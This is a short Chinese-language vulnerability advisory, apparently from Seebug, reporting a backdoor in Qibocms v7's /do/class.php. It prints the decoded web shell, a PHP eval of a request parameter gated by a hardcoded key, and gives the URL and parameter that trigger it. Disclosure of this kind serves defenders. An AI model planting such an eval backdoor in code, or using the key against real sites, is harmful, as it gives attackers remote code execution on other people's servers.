Qibocms v7 /do/class.php 后门

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>漏洞相关文件:</p><p>/do/class.php</p><p>后门内容</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434682387540-1.png" data-image-size="865,109"><br></p><p>解密后内容<br></p><pre class="">&lt;?phpif($_GET['key']=='90sec')&nbsp;&nbsp;&nbsp; @eval($_REQUEST['shellcode']);?&gt;</pre><p><br></p><p>漏洞利用过程</p><p>后门地址:<a href="http://domain/do/class.php?key=90sec">http://domain/do/class.php?key=90sec</a></p><p>密码:shellcode</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434682430825-1.png" data-image-size="865,758"><br></p>

0%
暂无可用Exp或PoC
当前有0条受影响产品信息